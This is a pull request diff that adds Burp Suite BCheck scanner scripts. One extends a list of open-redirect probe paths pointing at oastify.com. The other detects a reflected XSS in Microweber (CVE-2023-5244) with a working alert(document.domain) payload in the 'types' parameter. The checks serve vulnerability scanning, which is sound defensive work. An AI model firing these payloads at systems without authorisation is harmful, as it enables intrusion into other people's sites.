Merge pull request #161 from nithisshs/main

Update and create a Bcheck script

other/Openredirect/mass48-openredirect.bcheck

@@ -55,7 +55,8 @@ run for each:
        "/?image=https://oastify.com/",
        "/?requestTokenAndRedirect=https://oastify.com/",
        "/?retURL=https://oastify.com/",
-       "/?next_url=https://oastify.com/"
+       "/?next_url=https://oastify.com/",
+       "/project/switch/1?targetPath=https://oastify.com/"
 
 given host then
     send request called check:
@@ -68,4 +69,4 @@ given host then
             confidence: certain
             detail: `Open Redirect found at {potential_path}.`
             remediation: "Ensure your website is not redirecting the users outside it without whitelist."
-    end if
+    end if

vulnerabilities-CVEd/CVE-2023-5244-Microweber < V.2.0-Cross-Site-Scripting.bcheck

@@ -0,0 +1,25 @@
+metadata:
+    language: v2-beta
+    name: "CVE-2023-5244 - Microweber < V.2.0 - Cross-Site Scripting"
+    description: "Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint."
+    author: "Nithissh"
+
+run for each:
+    # you could add more values to this list to make the check repeat
+    potential_path =
+        "/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27"
+
+given host then
+    send request called check:
+        method: "GET"
+        path: {potential_path}
+
+    if "200" in {check.response.status_code} and "text/html" in {check.response.headers}
+           and "alert(document.domain)" in {check.response.headers}
+           and "microweber" in {check.response.headers} then
+        report issue:
+            severity: medium
+            confidence: certain
+            detail: `Reflected XSS found at {potential_path}.`
+            remediation: "Upgrade to the latest version and for reference: https://huntr.dev/bounties/a3bd58ba-ca59-4cba-85d1-799f73a76470"
+    end if